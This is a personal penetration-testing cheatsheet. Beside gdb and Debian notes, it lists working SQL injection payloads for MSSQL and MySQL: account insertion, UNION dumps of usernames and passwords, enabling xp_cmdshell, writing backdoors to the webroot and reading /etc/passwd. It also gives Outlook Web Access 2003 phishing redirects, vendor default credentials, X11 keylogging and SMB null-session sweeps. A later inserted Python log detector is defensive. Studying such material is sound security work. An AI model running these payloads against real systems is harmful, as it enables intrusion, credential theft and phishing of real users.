
Cheatsheets

Debugging

launch a binary by filename from scratch:
$ sudo gdb /usr/sbin/programname
attach to an already-running process (PID as the second argument):
$ sudo gdb /usr/sbin/programname 4860

self-explanatory:
(gdb) run
(gdb) generate-core-file
(gdb) detach

print stack (equivalent to 'backtrace' or 'bt' command):
(gdb) where

print lines of source code:
(gdb) list

register values:
(gdb) info reg

Hint: install the relevant debug symbols package for the program first, otherwise the backtrace will show only addresses.

useful links:
http://dirac.org/linux/gdb/01-Introduction.php
https://wiki.ubuntu.com/DebuggingProgramCrash
http://www.digilife.be/quickreferences/QRC/GDB%20Quick%20Reference.pdf


SQLi (mainly MSSQL and MySQL)

Add a flag table as proof of concept:
CREATE TABLE pentester(was char(5),here char(5))
Verify by confirming that a well-formed query against the new table returns no error (if the vulnerability is error-based SQLi), e.g.:
http://target.foo/vuln.asp?id=1;SELECT * FROM pentester--
If the table was NOT created successfully, you should get an error like:
Invalid object name "pentester"
Add a new account even if single and/or double quotation marks are filtered. Integers are converted to strings, so in this case the added username and password would both be "666" (without the quotation marks):
INSERT INTO users (user_id, username, password) VALUES (666,666,666)--
e.g.:
http://target.foo/vuln.asp?id=1;INSERT%20INTO%20users%20(user_id,%20username,%20password)%20VALUES%20(666,666,666)--
Traverse to a table other than the current one and enumerate its column names through GROUP BY / HAVING errors:
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20having%201=1--
Returns:
users.USER_ID
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id%20having%201=1--
Returns:
users.USERNAME
http://target.foo/vuln.asp?id=1;select%20*%20from%20users%20group%20by%20user_id,username%20having%201=1--
Returns:
users.PASSWORD
And so on, until no more similar SQL errors are returned.

Get the actual records. Note: the SELECTed integers are dummy values that pad the column count to match the number of columns in the original (pre-UNION) SELECT statement:
http://target.foo/vuln.php?id=1+union+select+concat(username,0x3a,password),2,3,4,5,6,7+from+users--
Note: MS SQL Server does not support the concat() function; use the '+' operator instead.


Enable xp_cmdshell. Only works with sa/dbo rights. Useful on SQL Server 2005:
EXEC master.dbo.sp_configure "show advanced options", 1
RECONFIGURE
EXEC master.dbo.sp_configure "xp_cmdshell", 1
RECONFIGURE

e.g.:

/vulnerable.cfm?ID=1;EXEC%20master.dbo.sp_configure%20%22show%20advanced%20options%22,%201;RECONFIGURE;EXEC%20master.dbo.sp_configure%20%22xp_cmdshell%22,%201;RECONFIGURE

Then write your backdoor shell code to the webroot, e.g.:
EXEC master..xp_cmdshell "echo EVIL_CODE_HERE>d:\inetpub\wwwroot"

Save arbitrary content on filesystem (useful to achieve remote command execution on MySQL servers):
SELECT "evil content" INTO OUTFILE "/path/to/backdoor.php";
Get the current user (error-based):
or 1=convert(int,(USER))--
Get the sa hash on MS SQL 2005:
SELECT password_hash FROM sys.sql_logins where name='sa'
Get file contents ('/etc/passwd' in this case):
SELECT load_file('/etc/passwd');
Use double quotes if single quotes are filtered:
SELECT load_file("/etc/passwd");
If both single and double quotes are filtered, then hex-encode the filename. Note: you can use the CAL9000 "straight" hex encoder to encode other filenames (don't forget to prepend the hex string with '0x'):
SELECT load_file(0x2F6574632F706173737764);
Examples of interesting payloads (useful for blind SQLi):
UPDATE users SET password="1234" WHERE id=1;
If the target table is not in the current database, then prefix it with the name of the database it belongs to:
UPDATE dbname.users SET password="1234" WHERE id=1;
Blind SQLi delay test:
waitfor delay '0:0:10';
Don't forget to test variations that depend on where the payload is injected in the original SQL statement, e.g.:
http://target.foo/vuln.asp?id=1%27);waitfor%20delay%20%270:0:10%27--
Blind SQLi boolean test:
 AND 1=1
versus:
 AND 1=0
e.g.:
http://target.foo/vuln.asp?id=1+AND+1=1
Compare the responses, e.g. different content length, different errors in the HTTP headers, etc.

Location of MySQL user hashes: table 'user' in the 'mysql' database, e.g.:
SELECT Host,User,Password FROM mysql.user;
Location of *all* MySQL database names and table names: table 'TABLES' in the 'information_schema' database, e.g.:
SELECT TABLE_SCHEMA,TABLE_NAME FROM information_schema.TABLES;
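A defensive counterpart to the injection patterns listed in this section, added here as an example and not part of the original cheatsheet: a small Python detector that URL-decodes the request path of each web-server access-log line and flags the signatures shown above (stacked queries, HAVING-based column enumeration, UNION SELECT, waitfor delay, xp_cmdshell/sp_configure, load_file/INTO OUTFILE, convert(int,...), information_schema lookups). The log lines are constructed for the example; the signature names are my own labels.

```python
import re
from urllib.parse import unquote_plus
# Signatures for the injection techniques listed above. Each pattern is applied to the
# URL-decoded, lower-cased request path, so %20 / + encoding and case changes do not hide it.
SIGNATURES = {
    "stacked-query":  re.compile(r";\s*(select|insert|update|delete|exec|waitfor)\b"),
    "column-enum":    re.compile(r"\bhaving\s+1\s*=\s*1\b"),
    "union-select":   re.compile(r"\bunion\s+(all\s+)?select\b"),
    "time-delay":     re.compile(r"\bwaitfor\s+delay\b"),
    "boolean-probe":  re.compile(r"\b(and|or)\s+1\s*=\s*[01]\b"),
    "mssql-cmdshell": re.compile(r"\bxp_cmdshell\b|\bsp_configure\b"),
    "mysql-file-io":  re.compile(r"\bload_file\s*\(|\binto\s+outfile\b"),
    "error-based":    re.compile(r"\bconvert\s*\(\s*int\b"),
    "schema-lookup":  re.compile(r"\binformation_schema\b|\bmysql\.user\b"),
}

def decode_request(line):
    """Return the URL-decoded, lower-cased request path from a Combined Log Format line, or None."""
    m = re.search(r'"(?:GET|POST|HEAD)\s+(\S+)', line)
    if not m:
        return None
    # Decode twice: a double-encoded payload (%2527 -> %27 -> ') would otherwise slip through.
    return unquote_plus(unquote_plus(m.group(1))).lower()

def classify(line):
    """Return the names of all signatures matching one access-log line (empty list if none)."""
    req = decode_request(line)
    if req is None:
        return []
    return [name for name, rx in SIGNATURES.items() if rx.search(req)]

def scan(lines):
    """Yield (signature names, raw line) for every line matching at least one signature."""
    for line in lines:
        hits = classify(line)
        if hits:
            yield hits, line

# Constructed sample log lines (not from any real server) mirroring the requests shown above.
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2009:10:00:00 +0000] "GET /vuln.asp?id=1 HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2009:10:00:01 +0000] "GET /vuln.asp?id=1;select%20*%20from%20users%20having%201=1-- HTTP/1.1" 500 311',
    '10.0.0.7 - - [01/Jan/2009:10:00:02 +0000] "GET /vuln.asp?id=1%27);waitfor%20delay%20%270:0:10%27-- HTTP/1.1" 200 512',
    '10.0.0.7 - - [01/Jan/2009:10:00:03 +0000] "GET /vuln.php?id=1+union+select+concat(username,0x3a,password),2,3+from+users-- HTTP/1.1" 200 901',
    '10.0.0.7 - - [01/Jan/2009:10:00:04 +0000] "GET /vulnerable.cfm?ID=1;EXEC%20master.dbo.sp_configure%20%22xp_cmdshell%22,%201;RECONFIGURE HTTP/1.1" 500 311',
]
if __name__ == "__main__":
    for hits, line in scan(SAMPLE_LOG):
        print(", ".join(hits), "<-", line)
```

Feed it `sys.stdin` or an opened access log instead of SAMPLE_LOG to run it over real traffic; a 500 status next to a hit is the same error-based signal the notes above rely on.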

Useful resources:
http://ferruh.mavituna.com/sql-injection-cheatsheet-oku/
http://michaeldaw.org/sql-injection-cheat-sheet/
http://pentestmonkey.net/index.php?option=com_content&task=category&sectionid=9&id=24&Itemid=1
http://www.toorcon.org/tcx/9_McCray.pdf
http://www.ngssoftware.com/papers/advanced_sql_injection.pdf
http://www.defcon.org/images/defcon-16/dc16-presentations/alonso-parada/defcon-16-alonso-parada-wp.pdf
http://www.defcon.org/images/defcon-16/dc16-presentations/defcon-16-alonso-parada.pdf

Command-line tools:
http://sqlmap.sourceforge.net/
http://sqlsus.sourceforge.net/
http://packetstormsecurity.org/UNIX/audit/sqlbftools-1.2.tar.gz

List of SQLi tools with brief reviews (in Spanish): http://www.unsec.net/2006/11/herramientas-sql-injection.html

Debian/Ubuntu/GNU Linux

Search for package names based on keywords:
$ sudo apt-cache search "Text-to-search"

e.g.:
$ sudo apt-cache search "mysql"
Example of network settings (static address; the original listing was garbled, and the interface name eth0 below is an assumption):
$ cat /etc/network/interfaces
auto lo
iface lo inet loopback

# interface name assumed to be eth0
auto eth0
iface eth0 inet static
address 10.10.50.65
netmask 255.255.255.0
gateway 10.10.50.1

Finding world-writable files and directories:
# find / -type f \( -perm -2 -o -perm -20 \) -exec ls -lg {} \; 2>/dev/null >writable.txt
# find / -type d \( -perm -2 -o -perm -20 \) -exec ls -ldg {} \; 2>/dev/null >>writable.txt

Finding setuid/setgid files:
# find / -type f \( -perm -004000 -o -perm -002000 \) -exec ls -lg {} \; 2>/dev/null >suidfiles.txt

References: http://www.gentoo.org/doc/en/security/security-handbook.xml?part=1&chap=6

Change DNS server settings permanently so they are not overwritten via DHCP:
- edit /etc/dhcp3/dhclient.conf
- uncomment the supersede statement and set the desired servers, e.g.: supersede domain-name-servers 208.67.222.222,208.67.220.220;
- restart networking, e.g.: sudo /etc/init.d/networking restart

Outlook Web Access (OWA) 2003

Exchange admin:
https://webmail.target.foo/exadmin/

Cross-domain redirect (the redirect happens after clicking "Log on", even if the credentials are invalid):
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=http://webmail.target.foo.fake.com/

For the following redirect, the credentials must be valid:
https://webmail.target.foo/exchweb/bin/redir.asp?URL=http://webmail.target.foo.fake.com/

VBScript error triggered by assigning a string to the 'reason' parameter (which expects a numeric value):
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?reason=abc

Error returned in HTML:
Microsoft VBScript runtime error '800a000d'

Type mismatch: '[string: "abc"]'

/exchweb/bin/auth/usa/logon.asp, line 542

Error returned in HTTP headers:
500 Internal Server Error

Advanced phishing: shows the fake login page after logging in, while still on the legitimate site.
syntax:
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/<victim_username>/Inbox/<email_subject>.EML/1_multipart_xF8FF_2_<html_attachment_filename>
e.g.:
https://webmail.target.foo/exchweb/bin/auth/owalogon.asp?url=https://webmail.target.foo/exchange/pgriffin/Inbox/OWA%20LOGON.EML/1_multipart_xF8FF_2_fake_login.html

More info here:
http://www.gnucitizen.org/blog/owning-outlook-web-access-owa-users/


Infrastructure pentesting

smb
test a cracked/found password via SMB:
smbclient \\\\targethost\\ipc$ -U username password
 
x11
packages required to build xkey.c: libxt-dev and probably x11proto-core-dev

if the target is misconfigured and allows connections from any host, e.g. after running:

$ xhost +

then we can:
$ export DISPLAY=server-host-name:0.0
remember to try different display numbers:
declare -x DISPLAY="10.10.3.11:1.0"
declare -x DISPLAY="10.10.3.11:2.0"
etc ...

Depends on open ports. i.e.: display 1 on tcp/6000, display 2 on tcp/6001 and so on.

Then use the X tools, e.g. xkey, xtv, etc.

Compaq Insight Manager (now known as HP System Management)
default credentials (username/password):
anonymous/<none>
user/user
user/public
user/<none>
administrator/administrator
operator/operator
PFCUser/240653C9467E45
default login URL: http://target.foo:2301/cpqlogin.htm

find hosts allowing null sessions in a subnet:
$ echo -en "\n" > returnchar.txt
$ for((i=1;i<255;++i));do echo -en "$i ";smbclient \\\\10.10.1.$i\\ipc$ "" -U ""<returnchar.txt;done;

Windows tricks/useful commands
 
find files whose name contains a certain string (case-insensitive search):
dir \ /s /b | find /I "password"
find files whose contents contain a certain string (case-insensitive search):
findstr /i /s "password" \*